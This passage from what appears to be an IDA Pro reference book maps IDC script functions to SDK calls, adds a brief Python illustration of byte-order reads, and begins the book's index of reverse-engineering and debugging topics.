OpOff if (base != 0xFFFFFFFF) set_offset(ea, n, base);

else noType(ea, n);

OpOffEx op_offset(ea, n, reftype, target, base, tdelta);

OpSeg op_seg(ea, n);

OpSign toggle_sign(ea, n);

OpStkvar op_stkvar(ea, n);

OpStroffEx op_stroff(ea, n, &strid, 1, delta);

ParseType qstring in(input);

if (in.last() != ';') in += ';';

flags |= PT_TYP;

if (flags & PT_NDC) flags |= PT_SIL;

else flags &= ~PT_SIL;

flags &= ~PT_NDC;

qstring name, type, fields;

parse_decl(idati, in.c_str(), &name, &type, &fields, flags);

internal_build_idc_typeinfo(&result, &type, &fields);

ParseTypes int hti_flags = (flags & 0x70) << 8;

if (flags & 1) hti_flags |= HTI_FIL;

parse_types2(input, (flags & 2) ? NULL : printer_func,

hti_flags);

PatchByte patch_byte(ea, value);

PatchDbgByte if (qthread_same(idc_debthread))

dbg->write_memory(ea, &value, 1);

else

put_dbg_byte(ea, value);

PatchDword patch_long(ea, value);

PatchWord patch_word(ea, value);

PauseProcess suspend_process();

PopXML pop_xml();

PrevAddr return prevaddr(ea);

PrevFchunk return get_prev_fchunk(ea)->startEA;

PrevFunction return get_prev_func(ea)->startEA;

PrevHead return prev_head(ea, minea);

PrevNotTail return prev_not_tail(ea);

ProcessUiAction return process_ui_action(name, flags);

PushXML push_xml(path);

Qword return get_qword(ea);

RebaseProgram return rebase_program(delta, flags);

RecalcSpd return recalc_spd(cur_ea);

Refresh refresh_idaview_anyway();

RefreshDebuggerMemory invalidate_dbgmem_config();

invalidate_dbgmem_contents(BADADDR, -1);

if (dbg && dbg->stopped_at_debug_event)

dbg->stopped_at_debug_event(true);

RefreshLists callui(ui_list);

RemoveFchunk remove_func_tail(get_func(funcea), tailea);

RenameArray qsnprintf(buf, sizeof(buf), "$ idc_array %s", name);

netnode n(id).rename(newname);

RenameEntryPoint rename_entry(ordinal, name);

RenameSeg set_segm_name(get_seg(ea), "%s", name);

ResumeThread return resume_thread(tid);

Rfirst return get_first_cref_from(From);

Rfirst0 return get_first_fcref_from(From);

RfirstB return get_first_cref_to(To);

RfirstB0 return get_first_fcref_to(To);

Rnext return get_next_cref_from(From, current);

Rnext0 return get_next_fcref_from(From, current);

RnextB return get_next_cref_to(To, current);

RnextB0 return get_next_fcref_to(To, current);

RunPlugin run_plugin(load_plugin(name), arg);

RunTo run_to(ea);

SaveBase char *fname = idbname ? idbname : database_idb;

uint32_t tflags = database_flags;

database_flags = (flags & 4) | (tflags & 0xfffffffb);

bool res = save_database(fname, 0);

database_flags = tflags;

return res;

ScreenEA return get_screen_ea();

SegAddrng //deprecated, see SetSegAddressing

SegAlign //macro, see SetSegmentAttr

SegBounds //deprecated, see SetSegBounds

SegByBase return get_segm_by_sel(base)->startEA;

SegByName sel_t seg;

atos(segname, &seg);

return seg;

SegClass //deprecated, see SetSegClass

SegComb //macro, see SetSegmentAttr

SegCreate //deprecated, see AddSeg

SegDefReg //deprecated, see SetSegDefReg

SegDelete //deprecated, see DelSeg

SegEnd //macro, see GetSegmentAttr

SegName segment_t *s = (segment_t*) get_seg(ea);

get_true_segm_name(s, buf, sizeof(buf));

return qstrdup(buf);

SegRename //deprecated, see RenameSeg

SegStart //macro, see GetSegmentAttr

SelEnd ea_t ea1, ea2;

read_selection(&ea1, &ea2);

return ea2;

SelStart ea_t ea1, ea2;

read_selection(&ea1, &ea2);

return ea1;

SelectThread select_thread(tid);

SetArrayFormat segment_t *s = get_seg(ea);

if (s)

uint32_t format[3];

netnode array(ea);

format[0] = flags;

format[1] = litems;

format[2] = align;

array.supset(5, format, sizeof(format));

SetArrayLong netnode n(id).altset(idx, value);

SetArrayString netnode n(id).supset(idx, str);

SetBmaskCmt set_bmask_cmt(enum_id, bmask, cmt, repeatable);

SetBmaskName set_bmask_name(enum_id, bmask, name);

SetBptAttr bpt_t bpt;

if (get_bpt(ea, &bpt) == 0) return;

if (bpattr == BPTATTR_SIZE) bpt.size = value;

else if (bpattr == BPTATTR_TYPE) bpt.type = value;

else if (bpattr == BPTATTR_COUNT) bpt.pass_count = value;

else if (bpattr == BPTATTR_FLAGS) bpt.flags = value;

update_bpt(&bpt);

SetBptCnd //macro for SetBptCndEx(ea, cnd, 0);

SetBptCndEx bpt_t bpt;

if (get_bpt(ea, &bpt) == 0) return;

bpt.cndbody = cnd;

if (is_lowcnd)

bpt.flags |= BPT_LOWCND;

else

bpt.flags &= ~BPT_LOWCND;

update_bpt(&bpt);

SetCharPrm if (offset >= 13 && offset <= 191)

*(offset + (char*)&inf) = value;

SetColor if (what == CIC_ITEM)

set_item_color(ea, color);

else if (what == CIC_FUNC)

func_t *f = get_func(ea);

f->color = color;

update_func(f);

else if (what == CIC_SEGM)

segment_t *s = get_seg(ea);

s->color = color;

s->update();

SetConstCmt set_const_cmt(const_id, cmt, repeatable);

SetConstName set_const_name(const_id, name);

SetDebuggerOptions return set_debugger_options(options);

SetEnumBf set_enum_bf(enum_id, flag ? 1 : 0);

SetEnumCmt set_enum_cmt(enum_id, cmt, repeatable);

SetEnumFlag set_enum_flag(enum_id, flag);

SetEnumIdx set_enum_idx(enum_id, idx);

SetEnumName set_enum_name(enum_id, name);

SetEnumWidth return set_enum_width(enum_id, width);

SetExceptionFlags excvec_t *ev = retrieve_exceptions();

for (excvec_t::iterator i = ev->begin(); i != ev->end(); i++)

if ((*i).code == code)

if ((*i).flags == flags)

return true;

else

(*i).flags = flags;

return store_exceptions();

return 0;

SetFchunkAttr func_t *f = get_func(ea);

internal_set_attr(f, attr, value);

update_func(f);

SetFchunkOwner set_tail_owner(get_func(tailea), funcea);

SetFixup fixup_data_t f = {type, targetsel, targetoff, displ};

set_fixup(ea, &f);

SetFlags setFlags(ea, flags);

SetFunctionAttr func_t *f = get_func(ea);

internal_set_attr(f, attr, value);

SetFunctionCmt set_func_cmt(get_func(ea), cmt, repeatable);

SetFunctionEnd func_setend(ea, end);

SetFunctionFlags //macro, see SetFunctionAttr

SetHashLong netnode n(id).hashset(idx, value);

SetHashString netnode n(id).hashset(idx, value);

SetHiddenArea hidden_area_t *ha = get_hidden_area(ea);

ha->visible = visible;

update_hidden_area(ha);

SetInputFilePath if (strlen(path) == 0) RootNode.set("");

else RootNode.set(path);

SetLineNumber set_source_linnum(ea, lnnum);

SetLocalType if (input == NULL || *input == 0) {
    del_numbered_type(idati, ordinal);
}
else {
    qstring name;
    qtype type, fields;
    parse_decl(idati, input, &name, &type, &fields, flags);
    if (ordinal == 0) {
        if (!name.empty()) {
            get_named_type(idati, name.c_str(),
                           NTF_TYPE | NTF_NOBASE, NULL, NULL,
                           NULL, NULL, NULL, &ordinal);
        }
        if (!ordinal) {
            ordinal = alloc_type_ordinal(idati);
        }
    }
    set_numbered_type(idati, value, 0, name.c_str(),
                      type.c_str(), fields.c_str(),
                      NULL, NULL, NULL);
}

SetLongPrm if (offset >= 13 && offset <= 188)

*(int*)(offset + (char*)&inf) = value;

SetManualInsn set_manual_insn(ea, insn);

SetMemberComment member_t *m = get_member(get_struc(ea), member_offset);

set_member_cmt(m, comment, repeatable);

SetMemberName set_member_name(get_struc(ea), member_offset, name);

SetMemberType typeinfo_t mt;

//calls an internal function to initialize mt using typeid

int size = get_data_elsize(-1, flag, &mt) * nitems;

set_member_type(get_struc(id), member_offset, flag, &mt, size);

SetProcessorType set_processor_type(processor, level);

SetReg //macro for SetRegEx(ea, reg, value, SR_user);

SetRegEx splitSRarea1(ea, str2reg(reg), value, tag, false);

SetRegValue regval_t r;

if (is_reg_integer(name))

r.ival = (unsigned int)VarLong(value);

else

memcpy(r.fval, VarFloat(value), 12);

set_reg_val(name, &r);

SetRemoteDebugger set_remote_debugger(hostname, password, portnum);

SetSegAddressing set_segm_addressing(get_seg(ea), use32);

SetSegBounds if (get_seg(ea)) {
    set_segm_end(ea, endea, flags);
    set_segm_start(ea, startea, flags);
}

SetSegClass set_segm_class(get_seg(ea), class);

SetSegDefReg SetDefaultRegisterValue(get_seg(ea), str2reg(reg), value);

SetSegmentAttr segment_t *s = get_seg(segea);

internal_set_attr(s, attr, value);

s->update();

SetSegmentType //macro, see SetSegmentAttr

SetSelector set_selector(sel, value);

SetShortPrm if (offset >= 13 && offset <= 190)

*(short*)(offset + (char*)&inf) = value;

SetSpDiff add_user_stkpnt(ea, delta);

SetStatus setStat(status);

SetStrucComment set_struc_cmt(id, cmt, repeatable);

SetStrucIdx set_struc_idx(get_struc(id), index);

SetStrucName set_struc_name(id, name);

SetTargetAssembler set_target_assembler(asmidx);

SetType apply_cdecl(ea, type);
    if (get_aflags(ea) & AFL_TILCMT)
        set_ti(ea, "", NULL);

SetXML set_xml(path, name, value);

Sleep qsleep(milliseconds);

StartDebugger start_process(path, args, sdir);

StepInto step_into();

StepOver step_over();

StepUntilRet step_until_ret();

StopDebugger exit_process();

StringStp //macro, see SetCharPrm

Tabs //macro, see SetCharPrm

TakeMemorySnapshot take_memory_snapshot(only_loader_segs);

TailDepth //macro, see SetLongPrm

Til2Idb return til2idb(idx, type_name);

Voids //macro, see SetCharPrm

Wait autoWait();

Warning warning(format, ...);

Word return get_full_word(ea);

XrefShow //macro, see SetCharPrm

XrefType Returns value of an internal global variable

____ //*** undocumented function (four underscores)

//returns database creation timestamp

return RootNode.altval(RIDX_ALT_CTIME);

_call //*** undocumented function

//uint32_t _call(uint32_t (*f)())

//f is a pointer in IDA’s (NOT the database’s) address space

return (*f)();

_lpoke //*** undocumented function

//uint32_t _lpoke(uint32_t *addr, uint32_t val)

//addr is an address in IDA’s (NOT the database’s) address

//space. This modifies IDA’s address space NOT the database’s

uint32_t old = *addr;

*addr = val;

return old;

_peek //*** undocumented function

//uint8_t _peek(uint8_t *addr)

//addr is in IDA’s address space

return *addr;

_poke //*** undocumented function

//uint8_t _poke(uint8_t *addr, uint8_t val)

//addr is an address in IDA’s (NOT the database’s) address

//space. This modifies IDA’s address space NOT the database’s

uint8_t old = *addr;

*addr = val;

return old;

_time //*** undocumented function

return _time64(NULL);

add_dref add_dref(From, To, drefType);

atoa ea2str(ea, buf, sizeof(buf));

return qstrdup(buf);

atol return atol(str);

byteValue //macro

del_dref del_dref(From, To);

delattr VarDelAttr(self, attr);

fclose qfclose(handle);

fgetc return qfgetc(handle);

filelength return efilelength(handle);

fopen return qfopen(file, mode);

form //deprecated, see sprintf

fprintf qfprintf(handle, format, ...);

fputc qfputc(byte, handle);

fseek qfseek(handle, offset, origin);

ftell return qftell(handle);

get_field_ea Too complex to summarize

get_nsec_stamp return get_nsec_stamp();

getattr idc_value_t res;

VarGetAttr(self, attr, &res);

return res;

hasattr return VarGetAttr(self, attr, NULL) == 0;

hasName //macro

hasValue //macro

isBin0 //macro

isBin1 //macro

isChar0 //macro

isChar1 //macro

isCode //macro

isData //macro

isDec0 //macro

isDec1 //macro

isDefArg0 //macro

isDefArg1 //macro

isEnum0 //macro

isEnum1 //macro

isExtra //macro

isFlow //macro

isFop0 //macro

isFop1 //macro

isHead //macro

isHex0 //macro

isHex1 //macro

isLoaded //macro

isOct0 //macro

isOct1 //macro

isOff0 //macro

isOff1 //macro

isRef //macro

isSeg0 //macro

isSeg1 //macro

isStkvar0 //macro

isStkvar1 //macro

isStroff0 //macro

isStroff1 //macro

isTail //macro

isUnknown //macro

isVar //macro

lastattr return qstrdup(VarLastAttr(self));

loadfile linput_t *li = make_linput(handle);

file2base(li, pos, ea, ea + size, false);

unmake_linput(li);

ltoa Calls internal conversion routine

mkdir return qmkdir(dirname, mode);

nextattr return qstrdup(VarNextAttr(self, attr));

ord return str[0];

prevattr return qstrdup(VarPrevAttr(self, attr));

print qstring qs;

VarPrint(&qs, arg);

msg("%s\n", qs.c_str());

readlong unsigned int res;

freadbytes(handle, &res, 4, mostfirst);

return res;

readshort unsigned short res;

freadbytes(handle, &res, 2, mostfirst);

return res;

readstr qfgets(buf, sizeof(buf), handle);

return qstrdup(buf);

rename return rename(oldname, newname);

rotate_left return rotate_left(value, count, nbits, offset);

savefile base2file(handle, pos, ea, ea + size);

set_start_cs //macro, see SetLongPrm

set_start_ip //macro, see SetLongPrm

setattr return VarSetAttr(self, attr, value) == 0;

sizeof type_t *t = internal_type_from_idc_typeinfo(type);

return get_type_size(idati, t);

sprintf qstring buf;

buf.sprnt(format, ...);

return qstrdup(buf.c_str());

strfill qstring s;

s.resize(len + 1, &chr);

return new qstring(s);

strlen return strlen(str);

strstr return strstr(str, substr);

substr Calls internal slice routine

trim return new qstring(string.c_str());

unlink return _unlink(filename);

writelong fwritebytes(handle, &dword, 4, mostfirst);

writeshort fwritebytes(handle, &word, 2, mostfirst);

writestr qfputs(str, handle);

xtol return strtoul(str, NULL, 16);
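
The readlong, readshort, writelong, and writeshort rows in this table all pass a mostfirst flag through to the SDK. As a rough illustration of what that flag controls, the following standalone Python sketch decodes the same bytes both ways. It does not call the SDK: read_uint is a hypothetical helper introduced here, the file handle is simulated with io.BytesIO, and returning None on a short read is an assumption rather than documented IDC behavior.

```python
import io
import struct


def read_uint(handle, size, mostfirst):
    """Read `size` bytes (2 or 4) and decode them as an unsigned integer.

    mostfirst mirrors the flag in the table: a true value means the most
    significant byte comes first (big-endian); false means little-endian.
    Returns None on a short read (an assumed convention for this sketch).
    """
    data = handle.read(size)
    if len(data) != size:
        return None
    fmt = {2: "H", 4: "I"}[size]          # unsigned short / unsigned int
    order = ">" if mostfirst else "<"     # big-endian / little-endian
    return struct.unpack(order + fmt, data)[0]


def readlong(handle, mostfirst):
    """Stand-in for the 4-byte read in the readlong row."""
    return read_uint(handle, 4, mostfirst)


def readshort(handle, mostfirst):
    """Stand-in for the 2-byte read in the readshort row."""
    return read_uint(handle, 2, mostfirst)


if __name__ == "__main__":
    raw = bytes([0x12, 0x34, 0x56, 0x78])
    print(hex(readlong(io.BytesIO(raw), True)))    # 0x12345678
    print(hex(readlong(io.BytesIO(raw), False)))   # 0x78563412
    print(hex(readshort(io.BytesIO(raw), True)))   # 0x1234
```

The same four bytes yield different values depending on the flag, so a script that parses a file format needs to pass the byte order of that format, not the byte order of the machine running IDA.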

INDEX

Special Characters & Numbers

#define statements, 257

#hint text# element, 338

#ifdef block, 258

#ifdef/#else block, 258

$ idc_array, 301, 331

$ prefix, 297

$HOME/.idapro/ida.key, 192

$HOME/.idapro/ida.reg file, 44, 207

* (asterisk key), 144

: (colon) hotkey, 107

; (semicolon) hotkey, 107

{ } (bracing) syntax, 254

>> (right-shift operator), 253, 458

1 byte of storage (db), 97

2 bytes of storage (dw), 97

4 bytes of storage (dd), 97

8-byte doubles, 136

32-bit version, vs. 64-bit version, 38

64-bit version, vs. 32-bit version, 38

A hotkey, 122

-A option, 197

-a option, 218

A suffix, ASCII strings, 447

-a switch, 71

Abort command, 205

absolute jumps, 436–437

accept_file function, 359, 362,

365, 367

ACCEPT_FIRST flag, 359

accept_simpleton_file function,

362, 367

accept_simpleton_loader function, 362

access specifiers, IDC, 256

Actions box, Breakpoint Settings

dialog, 526

activation records, 65, 83

ActiveSync, 517

Add Breakpoint option, 463, 523

Add standard structure button, Create

Structure/Union dialog,

143, 152

Add Watch option, 529–530

add_auto_stkpnt2 function, 392, 394

add_entry function, 364

add_segm functions, 308

add_segm_ex function, 308

add_struc function, 307

add_struc_member function, 307

add_til functions, 367

add_til2 function, 367

AddBpt function, 531, 554

AddBptEx function, 531

AddEntryPoint function, 357

AddHotkey function, 261

Address box, Breakpoint Settings

dialog, 524

Address field, Assemble Instruction

dialog, 240

AddressOfEntryPoint field, 351

ADDSEG_XXX values, 308

advanced mode toolbar, 53, 208

aiSee, GDL viewer, 193

AL register, 458

algorithmic analysis, 416

alias = register syntax, 105

alignment, 352

All segments button, Memory snapshot confirmation dialog, 542

allins.hpp file, 235, 303

allmake.mak file, 289

allmake.unx file, 289

Allocate Heap Block option, Functions menu, 471

Allocate Stack Block option, Functions menu, 471

alphabetically sorting, in Functions

window, 82

ALT-B hotkey, 99

alternate display format, selecting, 96

ALT-F8 hotkey, 461

ALT-H hotkey, 207

ALT-K hotkey, 118

ALT-L (Anchor) command, 243

ALT-P hotkey, 230, 424

ALT-Q hotkey, 147

altset function, 300

altvals, 297

ALT-x method, 191

Amini, Pedram, 204

ana function, 391

ana.cpp file, 385

analysis.idc script, 197

analyzer, for processor modules,

385–390

analyzing

algorithms, 416

binary, for different platform, 455

Anchor (ALT-L) command, 243

android_server server component, 570

anterior and posterior lines, 108

anti-debugging

hiding debugger, 555–560

technique, 452–454

and x86emu emulation-oriented

de-obfuscation of binaries,

471–472

anti–dynamic analysis techniques,

449–454

detecting debuggers, 452–453

detecting instrumentation,

451–452

detecting virtualization, 449–451

preventing debugging, 453–454

antipiracy techniques, 32

anti–reverse engineering techniques,

433–434

anti–static analysis techniques,

434–449

disassembly desynchronization,

434–437

dynamically computed target

addresses, 437–444

imported function obfuscation,

444–448

targeted attacks on analysis tools,

448–449

Apache web server, 23

API (Application Programming Interface), 289–314

header files, 290–294

iteration techniques using,

310–314

netnodes, 294–301

creating, 295–297

data storage in, 297–301

deleting, 301

SDK datatypes, 302–303

SDK functions, 304–309

App TRK, 517

Appcall feature, for Bochs, 578–580

Appcall variable, 579

Append Function Tail option, 115

Application option, debugger process options dialog, 571

Application Programming Interface.

See API

Apply new signature option, Signatures window, 75

AR_LONG constant, 260

AR_STR constant, 260

ar2idt.exe parser, 231

architectures

of processor modules, 409–411

RISC-style, 387

archive files, 155

area control block, 310

area_t (area.hpp), datatypes for SDK,

291, 293, 302

areacb_t class, 310

areacb_t variables, 310

area.hpp, 291, 310

arg_ prefix, 95

argc, 422, 425

argv, 422, 425

arithmetic instructions, simple, 11

ARM code, 410

armlinux_server server component, 570

array access operations, 135, 172

array elements

accessing, 131

selecting size for, 125

Array option, 125

array tag parameter, 298

Array-creation dialog, 124–125

array-manipulation functions,

259–260

arrays, 130–135

attributes for, 124–126

globally allocated arrays, 131–132

globally allocated structures, 137

heap-allocated arrays, 134–135

heap-allocated structures, 138–140

stack-allocated arrays, 132–134

stack-allocated structures, 138

structure member access, 135–137

of structures, 140–141

arrows window, IDA text view, 65

asc_ prefix, 123

ASCII characters, 121, 447

Ascii column, PDF Objects

window, 510

ASCII dump, searching, 99

ASCII printable characters, 27

ASCII String Style option, Option

menu, 122

ASCII strings, 447

ash variable, 292, 399

asize_t get_struc_size function, 307

AskFile function, 263, 265

askfile_c function, 305

AskStr function, 263

askstr function, 305

AskUsingForm_c dialogs, 340

AskUsingForm_c function, 305,

337–338, 341

AskXXX functions, 263, 292

askXXX interface functions, 334

AskYN function, 263

askyn_c function, 305

ASM files, generating, 242–243

asm_t struct, 380, 399, 402

asms

data member, 402

field, 402

ASPack program, 441

ASProtect program, 441

Assemble dialog, 239–241

Assemble Instruction dialog, 240

Assemble option, Patch Program

menu, 239

assembler tool, 4

assembly language call statement, 164

assembly languages, 4

Assume GCC v3.x names

checkbox, 163

asterisk key (*), 144

asynchronous communications, 504

asynchronous interaction, 536–537

Asynchronous Sockets techniques,

Windows, 504

AT&T assembly syntax, 9

atoll function, 264

Attach option, Debugger menu, 514,

518, 573

Attach to Process option, Debugger

menu, 516, 574

attributes

for arrays, 124–126

for functions, 115–118

auto comments, 233

Auto comments option, 110

auto keyword, IDC, 252

Autogenerated name option, for

named locations, 104

autogenerated names

in Names window, 104

prefixes for, 73

auto.hpp, for API, 291

B (button) field, 339

-B option, 197

b parameter, 94, 160

Bachaalany, Elias, 574

backdoor-style communications

channels, 450

backward navigation button, 83

Bad instruction <BAD> marks option,

110–111

bar function, 106

base address, of array, 131

BaseClass, 158–159

basic blocks, 61–62, 176–177

basic mode toolbar, 53, 208

batch mode, 189, 196–198

BDS (Binary Diffing Suite), 485

beginner mode, 206

big-endian, CPU, 10

bin directory

FLAIR tools, 217

for SDK, 287

binaries

OS X Mach-O, 24

searches, 493

statically linked, 178

used in first-generation

languages, 4

Binary Diffing Suite (BDS), 485

binary executable files, 18, 434

Binary File Descriptor library

(libbfd), 24

Binary File entry, 45–46

binary file obfuscation, 19

binary files, 347–375

alternative loaders, 372–373

analysis of unknown files, 348–349

loader for, 47–48

loader modules for

overview, 358

pcap loader, 366–372

simpleton loader, 361–366

writing using SDK, 358–360

manually loading Windows PE file,

349–357

scripted loaders, 373–375

binary form, plug-ins, 500

Binary Search dialog, 99

binary searches, of database, 99–100

BINARY_ADD byte code instruction, 379

BinDiff, 485

BinNavi, 280

binutils tool suite, GNU, 24

block statement, 160

blocking operation, 286

blocks, in disassembly window, 64

Bochs, 574–580

Appcall feature for, 578–580

disk image mode for, 577

IDB mode for, 575–576

PE mode for, 576–577

Bochs configuration dialog, 575

Bochs control module, 576

bochsrc file, 577

Borland

code, 419

tools, 404

Borland’s Turbo Assembler

(TASM), 9

Borland-style make files, 289

BOUNDS problem, Problems

Window, 77

BP based frame attribute,

117–118, 424

BP equals to SP attribute, 118

bpt_NtContinue function, 567–568

bracing ({ }) syntax, 254

branches, 171

Break checkbox, Breakpoint Settings

dialog, 526

break statement, 279

Breakpoint List option, Debugger

menu, 523

breakpoint manipulation tools, 519

Breakpoint Settings dialog, 523–526

breakpoints, in debugger, 522–526

bss section, 68, 356

B-tree–style database, 49

buffer array, 94

Bug Reports forum, Hex-Rays bulletin board, 58

bugs, reporting, 58

BugScam scripts, 481

build scripts, 461

BUILDING.txt file, 503

bulletin boards, Hex-Rays, 58

bundled graphing applications, 176

Burneye ELF encryption tool, 442,

455–459, 465, 467

button (B) field, 339

bximage tool, 577

byte code, 4, 379

Byte function, 262

byte_patched notification message, 322

bytes.hpp file, 291, 399

C enum, Enums window, 70

C hotkey, 48, 120

C notation, 130

-c option, 197

c parameter, 94

C_HEADER_PATH option, 203

C_PREDEFINED_MACROS option, 203

C++, 156–166

calling conventions, 88

inheritance relationships, 164–165

name mangling in, 162–163

object life cycle in, 160–161

reverse engineering references,

165–166

RTTI, 163–164

this pointer in, 156–157

virtual functions and vtables,

157–160

c++filt utility, 25–26

calculator program, Windows, 25

call esi instruction, 492

call flow type, 62, 171

call graphs, 178–180

call instructions, 112, 272, 456,

467, 480

Call Stack dialog, 529

call statement, 437

call_vfunc function, 159

call-by-reference, 255

call-by-value, 255

callflow function, 171

calling conventions

compiler differences for, 430–432

for stack frames, 85–89

call-style cross-references, 171

callui function, 305

canned search features, 98

canonical feature (CF), 381

Capture the Flag

binary, DEFCON, 278

network, DEFCON, 496

Case-sensitive option, 99–100

case-sensitive searches, 100, 493

catalog, of named constants, 112–113

cdecl calling convention, 85–86, 129

cdecl functions, 116

_cdecl modifier, 85

CF (canonical feature), 381

CF_CALL flag, 381

CF_CHGn flag, 381

CF_STOP flag, 381

CF_USEn flag, 381

cfg directory, 39

Change Byte menu option, Patch

Program, 238

Change Color button, color selection

dialog, 208

Change exception definition, Exception Handling dialog, 564

Change segment attributes dialog, 543

Change Stack Pointer option, 118

Character terminated strings, 122

Characteristics field, 357

charset function, 300

charval function, 297, 300

charval interface, 300

CheckBpt function, 531–532

choose function, 305, 334

Choose project to attach to dialog, 515

choose2 dialog, 337

choose2 function, 305, 334, 336, 566

chooser dialog, 335

chunked functions, 114–115, 272

CL register, 431

Clampi trojan, 442

class constructor, 160

.class file, 472

Class Informer plug-in, 420, 506–508

class relationships, deducing

between, 165

click-and-drag operation, 119

C-like pseudocode, 500

closing, IDA database files, 51–52

cmd variable, 385, 394

cmd.Operands array, 387, 390

cnbits field, 385

code

converting to data, 119–120

display options for, 109–111

code argument, 339

code bytes, distinguishing from data

bytes, 48

CODE class, 308

code cross-references, 65, 168–169

Code option, 435

CODE XREF, 169

coding scheme, used in Names

window, 73

COFF libraries, 219

collabREate plug-in, 503–506

Collapse Group button, 187

collapsed node demo, 187

collapsed structures, 146, 153–154

collapsing blocks, in disassembly

window, 64

Collect garbage option, 52

collisions, 221, 223

colon (:) hotkey, 107

color key, 54

color palettes, 192

color selection dialog, 208

coloring nodes, 186

colorized disassembly listings, 245

colors, customizing, 207–208

Colors command, 54

Columns menu option, Hex

window, 67

comma operator, 253

COMMAND function, 536

command history list, 40

command-line

arguments, 22

tools

Borland, 418, 426

Exports window, 68

IDA, 251

Segments window, 74

Comment directive, 232

comment member, for plug-ins, 317

comment.cmt file, 234–235

CommentEx function, 270

commenting

anterior and posterior lines, 108

augmenting information for, with

loadint, 233–235

auto, 233

function comments, 108

overview, 106

regular comments, 107

repeatable comments, 107–108

virtual repeatable, 108

comments option, 110

common operations bar, console user

interface, 190

compact_til function, 369

Compilation successful message, parsing header files, 150

Compiler configuration dialog,

Option menu, 151

compiler differences, 415–432

alternative calling conventions,

430–432

debug vs. release binaries, 428–430

jump tables, 416–420

locating main, 421–428

RTTI implementations, 420

switch statements, 416–420

compiler validation, reasons for

disassembly, 7

compilers

GNU, 86, 136

utilizing stack frames, 83

compiling functions, 89

computer licenses, 33

concrete_class object, 164

Condition field, Breakpoint Settings

dialog, 525

conditional branching, 11, 171

conditional breakpoints, 523

conditional jumps, 436–437

configuration dialog, Bochs, 575

configuration files, 39

configuring plug-ins, 330–331

connect function, 69, 127

console mode, 190–196

common features of, 190–191

specific features of

for Linux, 192–194

for OS X, 194–196

for Windows, 191

consoles

I/O library, 190

limitations of, 190

mouse server, Linux, 192

user interface, 190

constant index values, 137

constants, formatting options for, 112

CONTEXT record, 567

CONTEXT structure, 440, 472, 568

context-sensitive menus, 60, 102,

112, 501

Continue button, toolbar buttons, 521

Continue command, 521

Continue with Unpacked Base

option, 53

control flow graphs, 169, 178, 185

control module, Bochs, 576

converting data, to code (and vice

versa), 119–120

Cooper, Jeremy, 193, 195

CPU flag, 437, 520

CPU instructions

sets, 286

undocumented, 110

CPU registers, 440

cpu_data function, 394

crashes, restarting after, 52–53

CRC16 value, 220

crc16.cpp file, 220

Create as array option, 126

Create C File option, File menu, 500

Create EXE File command, 360, 365

Create EXE File option, File

menu, 542

create function, 296

Create function tails loader option,

Kernel Options, 115

Create name anyway option, for

named locations, 105

Create Segment command, 353

Create Structure/Union dialog,

143, 152

Create union checkbox, Create

Structure/Union dialog, 143

CREATE_BACKUPS option, 202

create_filename_cmt function, 363

create_func_frame function, 401

CreateArray function, 260, 301

createImportLabel function, 553–554

CreateNetnode function, 332

CreateThread function, 471

CRITICAL_SECTION object, 121

Cross References option, View

menu, 477

cross-references (xrefs), 168–176

code cross-references, 169–171

data cross-references, 171–173

display window, 174

enumerating, using API, 311–314

for function calls, 175–176

graphs for, 180–185

lists of, 173–175

navigational purposes, 81

subview, opening, 174

text, mousing over, 173

Cross-References tab, 172, 187

cryptographic library, OpenSSL,

215–216, 229

C-style strings, 71, 122

C-style union, 143

CTRL-B hotkey, 100

CTRL-ENTER hotkey, 83

CTRL-F1 hotkey, 203

CTRL-F4 hotkey, 191

CTRL-Q hotkey, 204

CTRL-T hotkey, 99

CTRL-X hotkey, 174

current instruction location, 386

current position indicator, 54

custom cross-reference graphs, 183

custom data

formats, 474

data types, 474

custom_ana code, 408

custom_emu code, 408

custom_mnem code, 408

custom_out code, 408

custom_outop code, 408

customizing, 201–210

colors, 207–208

configuration files, 201–207

toolbars, 208–210

cya instruction, 408

Cygwin environment, 17

D command, 144

D hotkey, 120, 122

d_out function, 394, 398, 401

dashed line break, 171

data

converting to code, 119–120

specifying sizes for, 121–122

data bytes, distinguishing from code

bytes, 48

data carousel, 121–122

DATA class, 308

data cross-references, 168

data displays, 55

Data Format menu, Hex window, 67

data storage, in netnodes, 297–301

data structures. See also datatypes

arrays, 130–135

IDA structures, 142–146

importing new, 149–151

and TIL files, 154–156

using standard structures, 151–154

using structure templates, 146–149

DATA XREF, 169

database events, 321

Database Restore dialog, 52–53

data-flow analysis, 481

DataRescue, 32

datatype setup dialog, 121

datatypes. See also data structures

custom, 474

Hex-Rays, 501

for SDK, 302–303

toggling through, 122

db (1 byte of storage), 97

dbg_notification_t enum, 536

dbg_step_until_ret notification, 537

dbg_trace notification, 537

dbg.hpp, for API, 291

dd (4 bytes of storage), 97

dead listings, 79

debug binaries, vs. release binaries,

428–430

DEBUG flag, 330

debug registers, 440

debugger, 513–580

automating with plug-ins, 536–538

detecting, 452–453

displays, reasons for disassembly, 7

displays in, 518–521

handling exceptions with, 561–568

and IDA databases, 541–543

IdaStealth plug-in for, 560–561

instruction pointer warning, 549

launching, 514–518

preventing, 453–454

process control with, 521–530

breakpoints, 522–526

stack traces, 528–529

tracing, 526–528

watches, 529–530

process options dialog, 571–572

remote debugging with, 569–574

attaching to remote process,

573–574

exception handling during, 574

using Hex-Rays debugging

server, 570–573

using scripts and plug-ins

during, 574

selection dialog, 515–516

sessions, MyNav, 508

setup dialog, 545–546, 562–563, 574

scripting for, 530–535

using Bochs, 574–580

Appcall feature for, 578–580

disk image mode for, 577

IDB mode for, 575–576

PE mode for, 576–577

using with obfuscated code,

543–560

decryption and decompression

loops, 546–550

hiding debugger, 555–560

import table reconstruction,

550–555

launching process, 545–546

overview, 540–541

warning message, 518

Debugger menu

Attach option, 514, 518, 573

Attach to Process option, 516, 574

Breakpoint List option, 523

Debugger Options command, 562

Function Tracing option, 526

Instruction Tracing option, 526

Pause Process option, 516

Process Options command, 571

Refresh memory command, 579

Run option, 516

Run to Cursor option, 516

Select debugger option, 548

Stack Trace command, 528–529

Start Process option, 516, 518

Switch Debugger menu, 516

Take Memory Snapshot

command, 542

Terminate Process option, 517

Watch List option, 530

DECISION problem, Problems

Window, 77

declarations, in IDA text view, 65

decoding function, Burneye,

456–459, 465

decompiler editing options,

Hex-Rays, 501

decompilers, 5

dedicated frame pointer, 91

.def files, 403

Default checkbox, Save Disassembly

Desktop dialog, 209

Default offset column, 136

DEFAULT_FILE_FILTER option, 206

DEFCON 18, Capture the Flag network, 496

Deflate (Pack database) option, 52

DelBpt function, 531

deltas, 392

Demangled Names, Options

menu, 162

